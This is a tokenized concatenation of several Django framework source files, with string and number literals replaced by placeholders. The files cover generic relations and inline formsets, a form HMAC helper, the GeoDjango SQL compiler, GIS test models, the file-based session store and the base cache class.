<EOL> self . core_filters = { <EOL> '<STR_LIT>' % content_type_field_name : content_type . 
id , <EOL> '<STR_LIT>' % object_id_field_name : instance . _get_pk_val ( ) , <EOL> } <EOL> def get_query_set ( self ) : <EOL> try : <EOL> return self . instance . _prefetched_objects_cache [ self . prefetch_cache_name ] <EOL> except ( AttributeError , KeyError ) : <EOL> db = self . _db or router . db_for_read ( self . model , instance = self . instance ) <EOL> return super ( GenericRelatedObjectManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** self . core_filters ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> db = self . _db or router . db_for_read ( self . model , instance = instances [ <NUM_LIT:0> ] ) <EOL> query = { <EOL> '<STR_LIT>' % self . content_type_field_name : self . content_type . id , <EOL> '<STR_LIT>' % self . object_id_field_name : <EOL> set ( obj . _get_pk_val ( ) for obj in instances ) <EOL> } <EOL> qs = super ( GenericRelatedObjectManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** query ) <EOL> object_id_converter = instances [ <NUM_LIT:0> ] . _meta . pk . to_python <EOL> return ( qs , <EOL> lambda relobj : object_id_converter ( getattr ( relobj , self . object_id_field_name ) ) , <EOL> lambda obj : obj . _get_pk_val ( ) , <EOL> False , <EOL> self . prefetch_cache_name ) <EOL> def add ( self , * objs ) : <EOL> for obj in objs : <EOL> if not isinstance ( obj , self . model ) : <EOL> raise TypeError ( "<STR_LIT>" % self . model . _meta . object_name ) <EOL> setattr ( obj , self . content_type_field_name , self . content_type ) <EOL> setattr ( obj , self . object_id_field_name , self . pk_val ) <EOL> obj . save ( ) <EOL> add . alters_data = True <EOL> def remove ( self , * objs ) : <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> for obj in objs : <EOL> obj . delete ( using = db ) <EOL> remove . alters_data = True <EOL> def clear ( self ) : <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> for obj in self . all ( ) : <EOL> obj . 
delete ( using = db ) <EOL> clear . alters_data = True <EOL> def create ( self , ** kwargs ) : <EOL> kwargs [ self . content_type_field_name ] = self . content_type <EOL> kwargs [ self . object_id_field_name ] = self . pk_val <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> return super ( GenericRelatedObjectManager , self ) . using ( db ) . create ( ** kwargs ) <EOL> create . alters_data = True <EOL> return GenericRelatedObjectManager <EOL> class GenericRel ( ManyToManyRel ) : <EOL> def __init__ ( self , to , related_name = None , limit_choices_to = None , symmetrical = True ) : <EOL> self . to = to <EOL> self . related_name = related_name <EOL> self . limit_choices_to = limit_choices_to or { } <EOL> self . symmetrical = symmetrical <EOL> self . multiple = True <EOL> self . through = None <EOL> class BaseGenericInlineFormSet ( BaseModelFormSet ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , files = None , instance = None , save_as_new = None , <EOL> prefix = None , queryset = None ) : <EOL> from django . contrib . contenttypes . models import ContentType <EOL> opts = self . model . _meta <EOL> self . instance = instance <EOL> self . rel_name = '<STR_LIT:->' . join ( ( <EOL> opts . app_label , opts . object_name . lower ( ) , <EOL> self . ct_field . name , self . ct_fk_field . name , <EOL> ) ) <EOL> if self . instance is None or self . instance . pk is None : <EOL> qs = self . model . _default_manager . none ( ) <EOL> else : <EOL> if queryset is None : <EOL> queryset = self . model . _default_manager <EOL> qs = queryset . filter ( ** { <EOL> self . ct_field . name : ContentType . objects . get_for_model ( self . instance ) , <EOL> self . ct_fk_field . name : self . instance . pk , <EOL> } ) <EOL> super ( BaseGenericInlineFormSet , self ) . __init__ ( <EOL> queryset = qs , data = data , files = files , <EOL> prefix = prefix <EOL> ) <EOL> @ classmethod <EOL> def get_default_prefix ( cls ) : <EOL> opts = cls . 
model . _meta <EOL> return '<STR_LIT:->' . join ( ( opts . app_label , opts . object_name . lower ( ) , <EOL> cls . ct_field . name , cls . ct_fk_field . name , <EOL> ) ) <EOL> def save_new ( self , form , commit = True ) : <EOL> from django . contrib . contenttypes . models import ContentType <EOL> kwargs = { <EOL> self . ct_field . get_attname ( ) : ContentType . objects . get_for_model ( self . instance ) . pk , <EOL> self . ct_fk_field . get_attname ( ) : self . instance . pk , <EOL> } <EOL> new_obj = self . model ( ** kwargs ) <EOL> return save_instance ( form , new_obj , commit = commit ) <EOL> def generic_inlineformset_factory ( model , form = ModelForm , <EOL> formset = BaseGenericInlineFormSet , <EOL> ct_field = "<STR_LIT>" , fk_field = "<STR_LIT>" , <EOL> fields = None , exclude = None , <EOL> extra = <NUM_LIT:3> , can_order = False , can_delete = True , <EOL> max_num = None , <EOL> formfield_callback = None ) : <EOL> """<STR_LIT>""" <EOL> opts = model . _meta <EOL> from django . contrib . contenttypes . models import ContentType <EOL> ct_field = opts . get_field ( ct_field ) <EOL> if not isinstance ( ct_field , models . ForeignKey ) or ct_field . rel . to != ContentType : <EOL> raise Exception ( "<STR_LIT>" % ct_field ) <EOL> fk_field = opts . get_field ( fk_field ) <EOL> if exclude is not None : <EOL> exclude = list ( exclude ) <EOL> exclude . extend ( [ ct_field . name , fk_field . name ] ) <EOL> else : <EOL> exclude = [ ct_field . name , fk_field . name ] <EOL> FormSet = modelformset_factory ( model , form = form , <EOL> formfield_callback = formfield_callback , <EOL> formset = formset , <EOL> extra = extra , can_delete = can_delete , can_order = can_order , <EOL> fields = fields , exclude = exclude , max_num = max_num ) <EOL> FormSet . ct_field = ct_field <EOL> FormSet . 
ct_fk_field = fk_field <EOL> return FormSet <EOL> class GenericInlineModelAdmin ( InlineModelAdmin ) : <EOL> ct_field = "<STR_LIT>" <EOL> ct_fk_field = "<STR_LIT>" <EOL> formset = BaseGenericInlineFormSet <EOL> def get_formset ( self , request , obj = None , ** kwargs ) : <EOL> if self . declared_fieldsets : <EOL> fields = flatten_fieldsets ( self . declared_fieldsets ) <EOL> else : <EOL> fields = None <EOL> if self . exclude is None : <EOL> exclude = [ ] <EOL> else : <EOL> exclude = list ( self . exclude ) <EOL> exclude . extend ( self . get_readonly_fields ( request , obj ) ) <EOL> if self . exclude is None and hasattr ( self . form , '<STR_LIT>' ) and self . form . _meta . exclude : <EOL> exclude . extend ( self . form . _meta . exclude ) <EOL> exclude = exclude or None <EOL> can_delete = self . can_delete and self . has_delete_permission ( request , obj ) <EOL> defaults = { <EOL> "<STR_LIT>" : self . ct_field , <EOL> "<STR_LIT>" : self . ct_fk_field , <EOL> "<STR_LIT>" : self . form , <EOL> "<STR_LIT>" : partial ( self . formfield_for_dbfield , request = request ) , <EOL> "<STR_LIT>" : self . formset , <EOL> "<STR_LIT>" : self . extra , <EOL> "<STR_LIT>" : can_delete , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : fields , <EOL> "<STR_LIT>" : self . max_num , <EOL> "<STR_LIT>" : exclude <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return generic_inlineformset_factory ( self . model , ** defaults ) <EOL> class GenericStackedInline ( GenericInlineModelAdmin ) : <EOL> template = '<STR_LIT>' <EOL> class GenericTabularInline ( GenericInlineModelAdmin ) : <EOL> template = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> import pickle <EOL> from django . utils . crypto import salted_hmac <EOL> from django . utils import six <EOL> def form_hmac ( form ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , six . string_types ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> key_salt = '<STR_LIT>' <EOL> return salted_hmac ( key_salt , pickled ) . hexdigest ( ) </s>
<s> try : <EOL> from itertools import zip_longest <EOL> except ImportError : <EOL> from itertools import izip_longest as zip_longest <EOL> from django . utils . six . moves import zip <EOL> from django . db . backends . util import truncate_name , typecast_timestamp <EOL> from django . db . models . sql import compiler <EOL> from django . db . models . sql . constants import MULTI <EOL> from django . utils import six <EOL> SQLCompiler = compiler . SQLCompiler <EOL> class GeoSQLCompiler ( compiler . SQLCompiler ) : <EOL> def get_columns ( self , with_aliases = False ) : <EOL> """<STR_LIT>""" <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> result = [ '<STR_LIT>' % ( self . get_extra_select_format ( alias ) % col [ <NUM_LIT:0> ] , qn2 ( alias ) ) <EOL> for alias , col in six . iteritems ( self . query . extra_select ) ] <EOL> aliases = set ( self . query . extra_select . keys ( ) ) <EOL> if with_aliases : <EOL> col_aliases = aliases . copy ( ) <EOL> else : <EOL> col_aliases = set ( ) <EOL> if self . query . select : <EOL> only_load = self . deferred_to_columns ( ) <EOL> for col , field in zip ( self . query . select , self . query . select_fields ) : <EOL> if isinstance ( col , ( list , tuple ) ) : <EOL> alias , column = col <EOL> table = self . query . alias_map [ alias ] . table_name <EOL> if table in only_load and column not in only_load [ table ] : <EOL> continue <EOL> r = self . get_field_select ( field , alias , column ) <EOL> if with_aliases : <EOL> if col [ <NUM_LIT:1> ] in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( '<STR_LIT>' % ( r , qn2 ( col [ <NUM_LIT:1> ] ) ) ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . 
add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( col . as_sql ( qn , self . connection ) ) <EOL> if hasattr ( col , '<STR_LIT>' ) : <EOL> aliases . add ( col . alias ) <EOL> col_aliases . add ( col . alias ) <EOL> elif self . query . default_cols : <EOL> cols , new_aliases = self . get_default_columns ( with_aliases , <EOL> col_aliases ) <EOL> result . extend ( cols ) <EOL> aliases . update ( new_aliases ) <EOL> max_name_length = self . connection . ops . max_name_length ( ) <EOL> result . extend ( [ <EOL> '<STR_LIT>' % ( <EOL> self . get_extra_select_format ( alias ) % aggregate . as_sql ( qn , self . connection ) , <EOL> alias is not None <EOL> and '<STR_LIT>' % qn ( truncate_name ( alias , max_name_length ) ) <EOL> or '<STR_LIT>' <EOL> ) <EOL> for alias , aggregate in self . query . aggregate_select . items ( ) <EOL> ] ) <EOL> for ( table , col ) , field in zip ( self . query . related_select_cols , self . query . related_select_fields ) : <EOL> r = self . get_field_select ( field , table , col ) <EOL> if with_aliases and col in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col ) <EOL> self . _select_aliases = aliases <EOL> return result <EOL> def get_default_columns ( self , with_aliases = False , col_aliases = None , <EOL> start_alias = None , opts = None , as_pairs = False , local_only = False ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> if opts is None : <EOL> opts = self . query . model . _meta <EOL> aliases = set ( ) <EOL> only_load = self . deferred_to_columns ( ) <EOL> if start_alias : <EOL> seen = { None : start_alias } <EOL> for field , model in opts . get_fields_with_model ( ) : <EOL> if model == opts . 
concrete_model : <EOL> model = None <EOL> if local_only and model is not None : <EOL> continue <EOL> if start_alias : <EOL> try : <EOL> alias = seen [ model ] <EOL> except KeyError : <EOL> link_field = opts . get_ancestor_link ( model ) <EOL> alias = self . query . join ( ( start_alias , model . _meta . db_table , <EOL> link_field . column , model . _meta . pk . column ) ) <EOL> seen [ model ] = alias <EOL> else : <EOL> alias = self . query . included_inherited_models [ model ] <EOL> table = self . query . alias_map [ alias ] . table_name <EOL> if table in only_load and field . column not in only_load [ table ] : <EOL> continue <EOL> if as_pairs : <EOL> result . append ( ( alias , field . column ) ) <EOL> aliases . add ( alias ) <EOL> continue <EOL> field_sel = self . get_field_select ( field , alias ) <EOL> if with_aliases and field . column in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( field_sel , c_alias ) ) <EOL> col_aliases . add ( c_alias ) <EOL> aliases . add ( c_alias ) <EOL> else : <EOL> r = field_sel <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> if with_aliases : <EOL> col_aliases . add ( field . column ) <EOL> return result , aliases <EOL> def resolve_columns ( self , row , fields = ( ) ) : <EOL> """<STR_LIT>""" <EOL> values = [ ] <EOL> aliases = list ( self . query . extra_select ) <EOL> rn_offset = <NUM_LIT:0> <EOL> if self . connection . ops . oracle : <EOL> if self . query . high_mark is not None or self . query . low_mark : rn_offset = <NUM_LIT:1> <EOL> index_start = rn_offset + len ( aliases ) <EOL> values = [ self . query . convert_values ( v , <EOL> self . query . extra_select_fields . get ( a , None ) , <EOL> self . connection ) <EOL> for v , a in zip ( row [ rn_offset : index_start ] , aliases ) ] <EOL> if self . connection . ops . oracle or getattr ( self . 
query , '<STR_LIT>' , False ) : <EOL> for value , field in zip_longest ( row [ index_start : ] , fields ) : <EOL> values . append ( self . query . convert_values ( value , field , self . connection ) ) <EOL> else : <EOL> values . extend ( row [ index_start : ] ) <EOL> return tuple ( values ) <EOL> def get_extra_select_format ( self , alias ) : <EOL> sel_fmt = '<STR_LIT:%s>' <EOL> if hasattr ( self . query , '<STR_LIT>' ) and alias in self . query . custom_select : <EOL> sel_fmt = sel_fmt % self . query . custom_select [ alias ] <EOL> return sel_fmt <EOL> def get_field_select ( self , field , alias = None , column = None ) : <EOL> """<STR_LIT>""" <EOL> sel_fmt = self . get_select_format ( field ) <EOL> if field in self . query . custom_select : <EOL> field_sel = sel_fmt % self . query . custom_select [ field ] <EOL> else : <EOL> field_sel = sel_fmt % self . _field_column ( field , alias , column ) <EOL> return field_sel <EOL> def get_select_format ( self , fld ) : <EOL> """<STR_LIT>""" <EOL> if self . connection . ops . select and hasattr ( fld , '<STR_LIT>' ) : <EOL> sel_fmt = self . connection . ops . select <EOL> if self . query . transformed_srid and ( self . connection . ops . oracle or <EOL> self . connection . ops . spatialite ) : <EOL> sel_fmt = "<STR_LIT>" % ( self . query . transformed_srid , sel_fmt ) <EOL> else : <EOL> sel_fmt = '<STR_LIT:%s>' <EOL> return sel_fmt <EOL> def _field_column ( self , field , table_alias = None , column = None ) : <EOL> """<STR_LIT>""" <EOL> if table_alias is None : table_alias = self . query . model . _meta . db_table <EOL> return "<STR_LIT>" % ( self . quote_name_unless_alias ( table_alias ) , <EOL> self . connection . ops . quote_name ( column or field . column ) ) <EOL> class SQLInsertCompiler ( compiler . SQLInsertCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLDeleteCompiler ( compiler . SQLDeleteCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLUpdateCompiler ( compiler . 
SQLUpdateCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLAggregateCompiler ( compiler . SQLAggregateCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLDateCompiler ( compiler . SQLDateCompiler , GeoSQLCompiler ) : <EOL> """<STR_LIT>""" <EOL> def results_iter ( self ) : <EOL> if self . connection . ops . oracle : <EOL> from django . db . models . fields import DateTimeField <EOL> fields = [ DateTimeField ( ) ] <EOL> else : <EOL> needs_string_cast = self . connection . features . needs_datetime_string_cast <EOL> offset = len ( self . query . extra_select ) <EOL> for rows in self . execute_sql ( MULTI ) : <EOL> for row in rows : <EOL> date = row [ offset ] <EOL> if self . connection . ops . oracle : <EOL> date = self . resolve_columns ( row , fields ) [ offset ] <EOL> elif needs_string_cast : <EOL> date = typecast_timestamp ( str ( date ) ) <EOL> yield date </s>
<s> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils . importlib import import_module <EOL> geom_backend = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> module = import_module ( '<STR_LIT>' % geom_backend , '<STR_LIT>' ) <EOL> except ImportError : <EOL> try : <EOL> module = import_module ( geom_backend ) <EOL> except ImportError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' % geom_backend ) <EOL> try : <EOL> Geometry = module . Geometry <EOL> GeometryException = module . GeometryException <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' % geom_backend ) </s>
<s> from django . contrib . gis . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class City3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> point = models . PointField ( dim = <NUM_LIT:3> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class Interstate2D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class Interstate3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( dim = <NUM_LIT:3> , srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class InterstateProj2D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class InterstateProj3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( dim = <NUM_LIT:3> , srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class Polygon2D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> poly = models . PolygonField ( srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . 
name <EOL> @ python_2_unicode_compatible <EOL> class Polygon3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> poly = models . PolygonField ( dim = <NUM_LIT:3> , srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> class Point2D ( models . Model ) : <EOL> point = models . PointField ( ) <EOL> objects = models . GeoManager ( ) <EOL> class Point3D ( models . Model ) : <EOL> point = models . PointField ( dim = <NUM_LIT:3> ) <EOL> objects = models . GeoManager ( ) <EOL> class MultiPoint3D ( models . Model ) : <EOL> mpoint = models . MultiPointField ( dim = <NUM_LIT:3> ) <EOL> objects = models . GeoManager ( ) </s>
<s> import warnings <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) </s>
<s> import datetime <EOL> import errno <EOL> import os <EOL> import tempfile <EOL> from django . conf import settings <EOL> from django . contrib . sessions . backends . base import SessionBase , CreateError , VALID_KEY_CHARS <EOL> from django . core . exceptions import SuspiciousOperation , ImproperlyConfigured <EOL> from django . utils import timezone <EOL> class SessionStore ( SessionBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , session_key = None ) : <EOL> self . storage_path = type ( self ) . _get_storage_path ( ) <EOL> self . file_prefix = settings . SESSION_COOKIE_NAME <EOL> super ( SessionStore , self ) . __init__ ( session_key ) <EOL> @ classmethod <EOL> def _get_storage_path ( cls ) : <EOL> try : <EOL> return cls . _storage_path <EOL> except AttributeError : <EOL> storage_path = getattr ( settings , "<STR_LIT>" , None ) <EOL> if not storage_path : <EOL> storage_path = tempfile . gettempdir ( ) <EOL> if not os . path . isdir ( storage_path ) : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % storage_path ) <EOL> cls . _storage_path = storage_path <EOL> return storage_path <EOL> def _key_to_file ( self , session_key = None ) : <EOL> """<STR_LIT>""" <EOL> if session_key is None : <EOL> session_key = self . _get_or_create_session_key ( ) <EOL> if not set ( session_key ) . issubset ( set ( VALID_KEY_CHARS ) ) : <EOL> raise SuspiciousOperation ( <EOL> "<STR_LIT>" ) <EOL> return os . path . join ( self . storage_path , self . file_prefix + session_key ) <EOL> def _last_modification ( self ) : <EOL> """<STR_LIT>""" <EOL> modification = os . stat ( self . _key_to_file ( ) ) . st_mtime <EOL> if settings . USE_TZ : <EOL> modification = datetime . datetime . utcfromtimestamp ( modification ) <EOL> modification = modification . replace ( tzinfo = timezone . utc ) <EOL> else : <EOL> modification = datetime . datetime . 
fromtimestamp ( modification ) <EOL> return modification <EOL> def load ( self ) : <EOL> session_data = { } <EOL> try : <EOL> with open ( self . _key_to_file ( ) , "<STR_LIT:rb>" ) as session_file : <EOL> file_data = session_file . read ( ) <EOL> if file_data : <EOL> try : <EOL> session_data = self . decode ( file_data ) <EOL> except ( EOFError , SuspiciousOperation ) : <EOL> self . create ( ) <EOL> expiry_age = self . get_expiry_age ( <EOL> modification = self . _last_modification ( ) , <EOL> expiry = session_data . get ( '<STR_LIT>' ) ) <EOL> if expiry_age < <NUM_LIT:0> : <EOL> session_data = { } <EOL> self . delete ( ) <EOL> self . create ( ) <EOL> except IOError : <EOL> self . create ( ) <EOL> return session_data <EOL> def create ( self ) : <EOL> while True : <EOL> self . _session_key = self . _get_new_session_key ( ) <EOL> try : <EOL> self . save ( must_create = True ) <EOL> except CreateError : <EOL> continue <EOL> self . modified = True <EOL> self . _session_cache = { } <EOL> return <EOL> def save ( self , must_create = False ) : <EOL> session_data = self . _get_session ( no_load = must_create ) <EOL> session_file_name = self . _key_to_file ( ) <EOL> try : <EOL> flags = os . O_WRONLY | os . O_CREAT | getattr ( os , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if must_create : <EOL> flags |= os . O_EXCL <EOL> fd = os . open ( session_file_name , flags ) <EOL> os . close ( fd ) <EOL> except OSError as e : <EOL> if must_create and e . errno == errno . EEXIST : <EOL> raise CreateError <EOL> raise <EOL> dir , prefix = os . path . split ( session_file_name ) <EOL> try : <EOL> output_file_fd , output_file_name = tempfile . mkstemp ( dir = dir , <EOL> prefix = prefix + '<STR_LIT>' ) <EOL> renamed = False <EOL> try : <EOL> try : <EOL> os . write ( output_file_fd , self . encode ( session_data ) . encode ( ) ) <EOL> finally : <EOL> os . close ( output_file_fd ) <EOL> os . 
rename ( output_file_name , session_file_name ) <EOL> renamed = True <EOL> finally : <EOL> if not renamed : <EOL> os . unlink ( output_file_name ) <EOL> except ( OSError , IOError , EOFError ) : <EOL> pass <EOL> def exists ( self , session_key ) : <EOL> return os . path . exists ( self . _key_to_file ( session_key ) ) <EOL> def delete ( self , session_key = None ) : <EOL> if session_key is None : <EOL> if self . session_key is None : <EOL> return <EOL> session_key = self . session_key <EOL> try : <EOL> os . unlink ( self . _key_to_file ( session_key ) ) <EOL> except OSError : <EOL> pass <EOL> def clean ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def clear_expired ( cls ) : <EOL> storage_path = cls . _get_storage_path ( ) <EOL> file_prefix = settings . SESSION_COOKIE_NAME <EOL> for session_file in os . listdir ( storage_path ) : <EOL> if not session_file . startswith ( file_prefix ) : <EOL> continue <EOL> session_key = session_file [ len ( file_prefix ) : ] <EOL> session = cls ( session_key ) <EOL> session . create = lambda : None <EOL> session . load ( ) </s>
<s> "<STR_LIT>" <EOL> from __future__ import unicode_literals <EOL> import warnings <EOL> from django . core . exceptions import ImproperlyConfigured , DjangoRuntimeWarning <EOL> from django . utils . importlib import import_module <EOL> class InvalidCacheBackendError ( ImproperlyConfigured ) : <EOL> pass <EOL> class CacheKeyWarning ( DjangoRuntimeWarning ) : <EOL> pass <EOL> MEMCACHE_MAX_KEY_LENGTH = <NUM_LIT> <EOL> def default_key_func ( key , key_prefix , version ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( key_prefix , version , key ) <EOL> def get_key_func ( key_func ) : <EOL> """<STR_LIT>""" <EOL> if key_func is not None : <EOL> if callable ( key_func ) : <EOL> return key_func <EOL> else : <EOL> key_func_module_path , key_func_name = key_func . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> key_func_module = import_module ( key_func_module_path ) <EOL> return getattr ( key_func_module , key_func_name ) <EOL> return default_key_func <EOL> class BaseCache ( object ) : <EOL> def __init__ ( self , params ) : <EOL> timeout = params . get ( '<STR_LIT>' , params . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> try : <EOL> timeout = int ( timeout ) <EOL> except ( ValueError , TypeError ) : <EOL> timeout = <NUM_LIT> <EOL> self . default_timeout = timeout <EOL> options = params . get ( '<STR_LIT>' , { } ) <EOL> max_entries = params . get ( '<STR_LIT>' , options . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> try : <EOL> self . _max_entries = int ( max_entries ) <EOL> except ( ValueError , TypeError ) : <EOL> self . _max_entries = <NUM_LIT> <EOL> cull_frequency = params . get ( '<STR_LIT>' , options . get ( '<STR_LIT>' , <NUM_LIT:3> ) ) <EOL> try : <EOL> self . _cull_frequency = int ( cull_frequency ) <EOL> except ( ValueError , TypeError ) : <EOL> self . _cull_frequency = <NUM_LIT:3> <EOL> self . key_prefix = params . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . version = params . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . key_func = get_key_func ( params . 
get ( '<STR_LIT>' , None ) ) <EOL> def make_key ( self , key , version = None ) : <EOL> """<STR_LIT>""" <EOL> if version is None : <EOL> version = self . version <EOL> new_key = self . key_func ( key , self . key_prefix , version ) <EOL> return new_key <EOL> def add ( self , key , value , timeout = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def get ( self , key , default = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def set ( self , key , value , timeout = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def delete ( self , key , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def get_many ( self , keys , version = None ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for k in keys : <EOL> val = self . get ( k , version = version ) <EOL> if val is not None : <EOL> d [ k ] = val <EOL> return d <EOL> def has_key ( self , key , version = None ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( key , version = version ) is not None <EOL> def incr ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> value = self . get ( key , version = version ) <EOL> if value is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> new_value = value + delta <EOL> self . set ( key , new_value , version = version ) <EOL> return new_value <EOL> def decr ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> return self . incr ( key , - delta , version = version ) <EOL> def __contains__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . has_key ( key ) <EOL> def set_many ( self , data , timeout = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> for key , value in data . items ( ) : <EOL> self . set ( key , value , timeout = timeout , version = version ) <EOL> def delete_many ( self , keys , version = None ) : <EOL> """<STR_LIT>""" <EOL> for key in keys : <EOL> self . 
delete ( key , version = version ) <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def validate_key ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if len ( key ) > MEMCACHE_MAX_KEY_LENGTH : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( key , MEMCACHE_MAX_KEY_LENGTH ) , <EOL> CacheKeyWarning ) <EOL> for char in key : <EOL> if ord ( char ) < <NUM_LIT> or ord ( char ) == <NUM_LIT> : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % key , <EOL> CacheKeyWarning ) <EOL> def incr_version ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> if version is None : <EOL> version = self . version <EOL> value = self . get ( key , version = version ) <EOL> if value is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> self . set ( key , value , version = version + delta ) <EOL> self . delete ( key , version = version ) <EOL> return version + delta <EOL> def decr_version ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> return self . incr_version ( key , - delta , version ) </s>
